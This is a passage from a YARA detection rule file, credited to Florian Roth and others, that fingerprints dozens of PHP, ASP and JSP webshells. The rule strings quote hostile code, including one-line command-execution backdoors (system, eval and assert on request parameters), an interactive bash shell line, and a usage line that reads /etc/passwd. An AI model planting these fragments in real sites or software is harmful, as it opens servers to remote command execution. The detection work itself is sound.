   		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword   
   		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword   
   		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword   
   	condition:   
   		1 of them   
rule ak74shell_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "7f83adcb4c1111653d30c6427a94f66f"   
   	strings:   
   		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["   
   		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"   
   		$s3 = "$xshell"   
   	condition:   
   		2 of them   
rule DarkSecurityTeam_Webshell {   
   	meta:   
   		description = "Dark Security Team Webshell"   
   		author = "Florian Roth"   
   		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"   
   		score = 50   
   	strings:   
   		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii   
   	condition:   
   		1 of them   
rule commands {   
   	meta:   
   		description = "Webshells Auto-generated - file commands.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "174486fe844cb388e2ae3494ac2d1ec2"   
   	strings:   
   		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"   
   		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"   
   	condition:   
   		all of them   
rule r57shell_3 {   
   	meta:   
   		description = "Webshells Auto-generated - file r57shell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "87995a49f275b6b75abe2521e03ac2c0"   
   	strings:   
   		$s1 = "<b>\".$_POST['cmd']"   
   	condition:   
   		all of them   
rule webshell_simple_backdoor {   
   	meta:   
   		description = "Web Shell - file simple-backdoor.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "f091d1b9274c881f8e41b2f96e6b9936"   
   	strings:   
   		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword   
   		$s1 = "if(isset($_REQUEST['cmd'])){" fullword   
   		$s4 = "system($cmd);" fullword   
   	condition:   
   		2 of them   
rule webshell_php_sh_server : webshell {   
   	meta:   
   		description = "Web Shell - file server.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 50   
   		hash = "d87b019e74064aa90e2bb143e5e16cfa"   
   	strings:   
   		$s0 = "eval(getenv('HTTP_CODE'));" fullword   
   	condition:   
   		all of them   
rule webshell_redirect {   
   	meta:   
   		description = "Web Shell - file redirect.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "97da83c6e3efbba98df270cc70beb8f8"   
   	strings:   
   		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "   
   	condition:   
   		all of them   
rule WebShell_RemExp_asp_php {   
   	meta:   
   		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"   
   		author = "Florian Roth"   
   		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"   
   	strings:   
   		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword   
   		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"   
   		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword   
   		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword   
   		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword   
   	condition:   
   		all of them   
rule lamashell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file lamashell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "de9abc2e38420cad729648e93dfc6687"   
   	strings:   
   		$s0 = "lama's'hell" fullword   
   		$s1 = "if($_POST['king'] == \"\") {"   
   		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"   
   	condition:   
   		1 of them   
rule WebShell_php_webshells_lolipop {   
   	meta:   
   		description = "PHP Webshells Github Archive - file lolipop.php"   
   		author = "Florian Roth"   
   		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"   
   	strings:   
   		$s3 = "$commander = $_POST['commander']; " fullword   
   		$s9 = "$sourcego = $_POST['sourcego']; " fullword   
   		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword   
   	condition:   
   		all of them   
rule PHP_Shell_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"   
   	strings:   
   		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"   
   		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="   
   	condition:   
   		all of them   
rule WebShell_JspWebshell_1_2_2 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"   
   		author = "Florian Roth"   
   		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"   
   	strings:   
   		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword   
   		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."   
   		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword   
   		$s15 = "endPoint=random1.getFilePointer();" fullword   
   		$s20 = "if (request.getParameter(\"command\") != null) {" fullword   
   	condition:   
   		3 of them   
rule PHP_Backdoor_v1 {   
   	meta:   
   		description = "Webshells Auto-generated - file PHP Backdoor v1.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "0506ba90759d11d78befd21cabf41f3d"   
   	strings:   
      
   		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"   
   		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"   
   	condition:   
   		all of them   
rule webshell_php_2 {   
   	meta:   
   		description = "Web Shell - file 2.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "267c37c3a285a84f541066fc5b3c1747"   
   	strings:   
   		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword   
   	condition:   
   		all of them   
rule WebShell_simattacker {   
   	meta:   
   		description = "PHP Webshells Github Archive - file simattacker.php"   
   		author = "Florian Roth"   
   		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"   
   	strings:   
   		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword   
   		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword   
   		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword   
   		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword   
   		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword   
   		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword   
   		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword   
   		$s20 = "$Comments=$_POST['Comments'];" fullword   
   	condition:   
   		2 of them   
rule WebShell_php_webshells_README {   
   	meta:   
   		description = "PHP Webshells Github Archive - file README.md"   
   		author = "Florian Roth"   
   		hash = "ef2c567b4782c994db48de0168deb29c812f7204"   
   	strings:   
   		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword   
   		$s1 = "php-webshells" fullword   
   	condition:   
   		all of them   
rule webshell_DarkBlade1_3_asp_indexx {   
   	meta:   
   		description = "Web Shell - file indexx.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "b7f46693648f534c2ca78e3f21685707"   
   	strings:   
   		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"   
   	condition:   
   		all of them   
rule WebShell_backupsql {   
   	meta:   
   		description = "PHP Webshells Github Archive - file backupsql.php"   
   		author = "Florian Roth"   
   		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"   
   	strings:   
   		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."   
   		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"   
   		$s2 = "* as email attachment, or send to a remote ftp server by" fullword   
   		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword   
   		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "   
   	condition:   
   		2 of them   
rule FSO_s_phvayv {   
   	meta:   
   		description = "Webshells Auto-generated - file phvayv.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "205ecda66c443083403efb1e5c7f7878"   
   	strings:   
   		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"   
   	condition:   
   		all of them   
rule webshell_webshells_new_pppp {   
   	meta:   
   		description = "Web shells - generated from file pppp.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "cf01cb6e09ee594545693c5d327bdd50"   
   	strings:   
   		$s0 = "Mail: chinese@hackermail.com" fullword   
   		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "   
   		$s6 = "Site: http://blog.weili.me" fullword   
   	condition:   
   		1 of them   
rule rootshell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file rootshell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "265f3319075536030e59ba2f9ef3eac6"   
   	strings:   
   		$s0 = "shells.dl.am"   
   		$s1 = "This server has been infected by $owner"   
   		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"   
   		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"   
   	condition:   
   		2 of them   
rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "b148ead15d34a55771894424ace2a92983351dda"   
   		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"   
   		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"   
   		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"   
   	strings:   
   		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword   
   		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword   
   		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword   
   		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword   
   	condition:   
   		2 of them   
rule jsp_reverse_jsp {   
   	meta:   
   		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "8b0e6779f25a17f0ffb3df14122ba594"   
   	strings:   
   		$s0 = "// backdoor.jsp"   
   		$s1 = "JSP Backdoor Reverse Shell"   
   		$s2 = "http://michaeldaw.org"   
   	condition:   
   		2 of them   
rule webshell_php_list {   
   	meta:   
   		description = "Web Shell - file list.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "922b128ddd90e1dc2f73088956c548ed"   
   	strings:   
   		$s1 = "// list.php = Directory & File Listing" fullword   
   		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"   
   		$s9 = "// by: The Dark Raver" fullword   
   	condition:   
   		1 of them   
rule h4ntu_shell__powered_by_tsoi_ {   
   	meta:   
   		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "06ed0b2398f8096f1bebf092d0526137"   
   	strings:   
   		$s0 = "h4ntu shell"   
   		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"   
   	condition:   
   		1 of them   
rule WebShell_php_backdoor {   
   	meta:   
   		description = "PHP Webshells Github Archive - file php-backdoor.php"   
   		author = "Florian Roth"   
   		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"   
   	strings:   
   		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword   
   		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"   
   		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword   
   		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword   
   		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "   
   	condition:   
   		1 of them   
rule Webshell_and_Exploit_CN_APT_HK : Webshell   
   {   
   meta:   
   	author = "Florian Roth"   
   	description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"   
   	date = "10.10.2014"   
   	score = 50   
   strings:   
   	$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword   
   	$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"   
   	$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"   
   condition:   
   	$a0 or ( all of ($s*) )   
rule multiple_webshells_0005 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php"   
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"   
   		hash1 = "911195a9b7c010f61b66439d9048f400"   
   		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"   
   		hash3 = "8023394542cddf8aee5dec6072ed02b5"   
   		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"   
   		hash5 = "817671e1bdc85e04cc3440bbd9288800"   
   	strings:   
   		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"   
   		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"   
   	condition:   
   		1 of them   
rule fmlibraryv3 {   
   	meta:   
   		description = "Webshells Auto-generated - file fmlibraryv3.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "c34c248fed6d5a20d8203924a2088acc"   
   	strings:   
   		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"   
   	condition:   
   		all of them   
rule EditServer_Webshell {   
   	meta:   
   		description = "Webshells Auto-generated - file EditServer.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "f945de25e0eba3bdaf1455b3a62b9832"   
   	strings:   
   		$s2 = "Server %s Have Been Configured"   
   		$s5 = "The Server Password Exceeds 32 Characters"   
   		$s8 = "9--Set Procecess Name To Inject DLL"   
   	condition:   
   		all of them   
rule webshell_Server_Variables {   
   	meta:   
   		description = "Web Shell - file Server Variables.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "47fb8a647e441488b30f92b4d39003d7"   
   	strings:   
   		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword   
   		$s9 = "Variable Name</B></font></p>" fullword   
   	condition:   
   		all of them   
rule webshell_webshells_new_JJJsp2 {   
   	meta:   
   		description = "Web shells - generated from file JJJsp2.jsp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "5a9fec45236768069c99f0bfd566d754"   
   	strings:   
   		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"   
   		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"   
   		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"   
   		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("   
   	condition:   
   		1 of them   
rule FSO_s_casus15_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file casus15.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "8d155b4239d922367af5d0a1b89533a3"   
   	strings:   
   		$s0 = "copy ( $dosya_gonder"   
   	condition:   
   		all of them   
rule jspshall_jsp {   
   	meta:   
   		description = "Semi-Auto-generated  - file jspshall.jsp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"   
   	strings:   
   		$s0 = "kj021320"   
   		$s1 = "case 'T':systemTools(out);break;"   
   		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"   
   	condition:   
   		2 of them   
rule WebShell_lamashell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file lamashell.php"   
   		author = "Florian Roth"   
   		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"   
   	strings:   
   		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword   
   		$s8 = "$curcmd = $_POST['king'];" fullword   
   		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword   
   		$s18 = "<title>lama's'hell v. 3.0</title>" fullword   
   		$s19 = "_|_  O    _    O  _|_" fullword   
   		$s20 = "$curcmd = \"ls -lah\";" fullword   
   	condition:   
   		2 of them   
rule webshell_php_fbi {   
   	meta:   
   		description = "Web Shell - file fbi.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "1fb32f8e58c8deb168c06297a04a21f1"   
   	strings:   
   		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"   
   	condition:   
   		all of them   
rule webshell_minupload {   
   	meta:   
   		description = "Web Shell - file minupload.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "ec905a1395d176c27f388d202375bdf9"   
   	strings:   
   		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword   
   		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"   
   	condition:   
   		all of them   
rule shankar_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file shankar.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "6eb9db6a3974e511b7951b8f7e7136bb"   
   	strings:   
   		$sAuthor = "ShAnKaR"   
   		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"   
   		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"   
   	condition:   
   		1 of ($s*) and $sAuthor   
rule SoakSoak_Infected_Wordpress {   
   	meta:   
   		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"   
   		reference = "http://goo.gl/1GzWUX"   
   		author = "Florian Roth"   
   		date = "2014/12/15"   
   		score = 60   
   	strings:   
   		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword   
   		$s1 = "function FuncQueueObject()" ascii fullword   
   		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword   
   	condition:   
   		all of ($s*)   
rule WebShell_CasuS_1_5 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file CasuS 1.5.php"   
   		author = "Florian Roth"   
   		hash = "7eee8882ad9b940407acc0146db018c302696341"   
   	strings:   
   		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"   
   		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword   
   		$s18 = "if (file_exists(\"F:\\\\\")){" fullword   
   	condition:   
   		1 of them   
rule webshell_ASP_cmd {   
   	meta:   
   		description = "Web Shell - file cmd.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "97af88b478422067f23b001dd06d56a9"   
   	strings:   
   		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword   
   	condition:   
   		all of them   
rule icyfox007v1_10_rar_Folder_asp {   
   	meta:   
   		description = "Webshells Auto-generated - file asp.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "2c412400b146b7b98d6e7755f7159bb9"   
   	strings:   
   		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"   
   	condition:   
   		all of them   
rule PhpShell {   
   	meta:   
   		description = "Webshells Auto-generated - file PhpShell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "539baa0d39a9cf3c64d65ee7a8738620"   
   	strings:   
   		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."   
   	condition:   
   		all of them   
rule webshell_Worse_Linux_Shell {   
   	meta:   
   		description = "Web Shell - file Worse Linux Shell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "8338c8d9eab10bd38a7116eb534b5fa2"   
   	strings:   
   		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"   
   	condition:   
   		all of them   
rule FSO_s_test {   
   	meta:   
   		description = "Webshells Auto-generated - file test.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "82cf7b48da8286e644f575b039a99c26"   
   	strings:   
   		$s0 = "$yazi = \"test\" . \"\\r\\n\";"   
   		$s2 = "fwrite ($fp, \"$yazi\");"   
   	condition:   
   		all of them   
rule HYTop_DevPack_server {   
   	meta:   
   		description = "Webshells Auto-generated - file server.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "1d38526a215df13c7373da4635541b43"   
   	strings:   
   		$s0 = "<!-- PageServer Below -->"   
   	condition:   
   		all of them   
rule PHP_sh {   
   	meta:   
   		description = "Webshells Auto-generated - file sh.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "1e9e879d49eb0634871e9b36f99fe528"   
   	strings:   
   		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"   
   	condition:   
   		all of them   
rule r57shell_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file r57shell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "8023394542cddf8aee5dec6072ed02b5"   
   	strings:   
   		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"   
   	condition:   
   		all of them   
rule webshell_jsp_cmdjsp_2 {   
   	meta:   
   		description = "Web Shell - file cmdjsp.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "1b5ae3649f03784e2a5073fa4d160c8b"   
   	strings:   
   		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword   
   		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword   
   	condition:   
   		all of them   
rule multiple_webshells_0032 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_nixrem_php_php_c99shell_v1_0_php_php_c99php_NIX_REMOTE_WEB_SHELL_v_0_5_alpha_Lite_Public_Version_php"   
   		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"   
   		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   		hash3 = "f3ca29b7999643507081caab926e2e74"   
   	strings:   
   		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword   
   		$s1 = "$ret = posix_kill($pid,$sig);" fullword   
   		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword   
   		$s3 = "$i = $nixpasswd;" fullword   
   	condition:   
   		2 of them   
rule zacosmall_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file zacosmall.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "5295ee8dc2f5fd416be442548d68f7a6"   
   	strings:   
   		$s0 = "rand(1,99999);$sj98"   
   		$s1 = "$dump_file.='`'.$rows2[0].'`"   
   		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"   
   	condition:   
   		2 of them   
rule WebShell_Generic_PHP_7 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "de98f890790756f226f597489844eb3e53a867a9"   
   		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"   
   		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"   
   		hash3 = "715f17e286416724e90113feab914c707a26d456"   
   	strings:   
   		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword   
   		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword   
   		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword   
   		$s4 = "if( $action == \"dumpTable\" )" fullword   
   	condition:   
   		2 of them   
rule webshell_PHP_c37 {   
   	meta:   
   		description = "Web Shell - file c37.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "d01144c04e7a46870a8dd823eb2fe5c8"   
   	strings:   
   		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"   
   		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"   
   	condition:   
   		all of them   
rule portlessinst {   
   	meta:   
   		description = "Webshells Auto-generated - file portlessinst.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "74213856fc61475443a91cd84e2a6c2f"   
   	strings:   
   		$s2 = "Fail To Open Registry"   
   		$s3 = "f<-WLEggDr\""   
   		$s6 = "oMemoryCreateP"   
   	condition:   
   		all of them   
rule webshell_201_3_ma_download {   
   	meta:   
   		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "a7e25b8ac605753ed0c438db93f6c498"   
   		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"   
   		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"   
   		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"   
   	strings:   
   		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"   
   		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"   
   		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="   
   	condition:   
   		all of them   
rule WebShell_simple_backdoor {   
   	meta:   
   		description = "PHP Webshells Github Archive - file simple-backdoor.php"   
   		author = "Florian Roth"   
   		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"   
   	strings:   
   		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword   
   		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword   
   		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword   
   		$s3 = "        echo \"</pre>\";" fullword   
   		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword   
   		$s5 = "        echo \"<pre>\";" fullword   
   		$s6 = "if(isset($_REQUEST['cmd'])){" fullword   
   		$s7 = "        die;" fullword   
   		$s8 = "        system($cmd);" fullword   
   	condition:   
   		all of them   
rule HYTop2006_rar_Folder_2006 {   
   	meta:   
   		description = "Webshells Auto-generated - file 2006.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "c19d6f4e069188f19b08fa94d44bc283"   
   	strings:   
   		$s6 = "strBackDoor = strBackDoor "   
   	condition:   
   		all of them   
rule lurm_safemod_on_cgi {   
   	meta:   
   		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "5ea4f901ce1abdf20870c214b3231db3"   
   	strings:   
   		$s0 = "Network security team :: CGI Shell" fullword   
   		$s1 = "#########################<<KONEC>>#####################################" fullword   
   		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword   
   	condition:   
   		1 of them   
rule multiple_webshells_0006 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
